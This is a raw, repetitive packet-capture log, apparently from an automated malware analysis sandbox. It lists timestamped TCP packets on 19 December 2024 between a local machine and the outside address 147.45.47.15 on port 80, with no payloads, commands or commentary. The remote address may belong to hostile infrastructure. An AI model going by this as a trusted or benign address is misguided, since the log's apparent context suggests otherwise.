                                                                                                  Dec 19, 2024 08:52:56.018671989 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.018817902 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.018868923 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.019665003 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.019762039 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.019818068 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.020556927 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.020677090 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.020725965 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.021534920 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.021641970 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.021697044 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.022511959 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.022644043 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.022706032 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.023421049 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.068353891 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.115099907 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.158025980 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.158099890 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.158186913 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.158282042 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.158421993 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.158477068 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.159481049 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.159660101 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.159713030 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.160173893 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.160356998 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.160504103 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.161274910 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.161439896 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.161498070 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.162107944 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.162224054 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.162297010 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.163120985 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.163219929 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.163279057 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.164067984 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.164141893 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.164196968 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.164994955 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.165132999 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.165189028 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.165960073 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.166083097 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.166137934 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.166987896 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.167241096 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.167299986 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.167916059 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.168006897 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.168061972 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.168873072 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.168991089 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.169090986 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.169871092 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.169962883 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.170022011 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.170823097 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.170897961 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.170953989 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.171766043 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.171875000 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.172003031 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.172755957 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.172887087 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.172945023 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.173696995 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.173863888 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.173919916 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.174654007 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.174767017 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.174822092 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.175641060 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.175775051 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.175831079 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.176614046 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.176852942 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.176908016 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.177617073 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.177741051 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.177793980 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.178527117 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.178617001 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.178673983 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.179569960 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.179666042 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.179728031 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.180471897 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.180594921 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.180658102 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.181504011 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.181559086 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.181615114 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.182431936 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.182532072 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.182593107 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.183341980 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.183535099 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.183582067 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.184649944 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.184740067 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.184787989 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.185321093 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.185400009 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.185451031 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.186248064 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.186343908 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.186394930 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.187210083 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.187354088 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.187406063 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.188183069 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.188285112 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.188329935 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.189202070 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.189277887 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.189392090 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.190104961 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.190228939 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.190280914 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.191102028 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.191184998 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.191235065 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.192053080 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.192163944 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.192213058 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.193008900 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.193123102 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.193173885 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.193967104 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.194092989 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.194139004 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.194947958 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.195044041 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.195097923 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.195950985 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.196063042 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.196114063 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.196916103 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.197005987 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.197056055 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.197855949 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.198014021 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.198065996 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.198905945 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.198993921 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.199045897 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.199944973 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.200031042 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.200097084 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.234679937 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.234724998 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.234790087 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.235121965 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.235265017 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.235316992 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.236082077 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.236237049 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.236296892 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.237068892 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.237219095 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.237270117 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.238058090 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.238147974 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.238200903 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.238975048 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.239069939 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.239121914 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.239993095 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.240101099 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.240149021 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.240909100 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.241007090 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.241064072 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.241871119 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.241954088 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.241996050 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.350275040 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.350332022 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.350378990 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.350697041 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.350790977 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.350847960 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.351711988 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.351847887 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.351896048 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.352662086 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.352740049 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.352782965 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.353606939 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.353718996 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.353790045 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.354630947 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.354727030 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.354779959 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.355565071 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.355693102 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.355742931 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.356523037 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.356621027 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.356666088 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.357516050 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.357609987 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.357661009 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.358444929 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.358575106 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.358619928 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.359483957 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.359559059 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.359603882 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.360398054 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.360518932 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.360577106 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.361361027 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.361464977 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.361515045 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.362377882 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.362482071 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.362535000 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.363291025 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.363394976 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.363447905 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.364311934 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.364582062 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.364640951 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.365247965 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.365362883 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.365407944 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.366184950 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.366301060 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.366347075 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.367153883 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.367252111 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.367304087 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.368134975 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.368230104 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.368285894 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.369081974 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.369281054 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.369328976 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.370059967 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.370171070 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.370215893 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.371022940 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.371104002 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.371156931 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.372025013 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.372163057 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.372216940 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.372955084 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.373080015 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.373142958 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.373914957 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.374083042 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.374136925 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.374891043 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.375004053 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.375056028 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.375870943 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.375972033 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.376023054 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.376830101 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.376946926 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.377047062 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.377809048 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.377923965 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.377980947 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.378777981 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.378890038 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.378946066 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.379779100 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.379828930 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.379884958 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.380729914 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.380825996 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.380875111 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.381669044 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.381779909 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.381824970 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.382642984 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.382749081 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.382793903 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.383619070 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.383713007 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.383760929 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.384571075 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.384675980 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.384727001 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.385631084 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.385658026 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.385704994 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.386498928 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.386601925 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.386646986 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.387469053 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.387569904 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.387636900 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.388444901 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.388777971 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.388823032 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.389400005 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.389492989 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.389544964 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.390347004 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.390453100 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.390495062 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.391339064 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.391438007 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.391489029 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.392311096 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.392476082 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.392527103 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.393265963 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.393384933 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:56.393430948 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:56.394239902 CET8049705147.45.47.15192.168.2.5
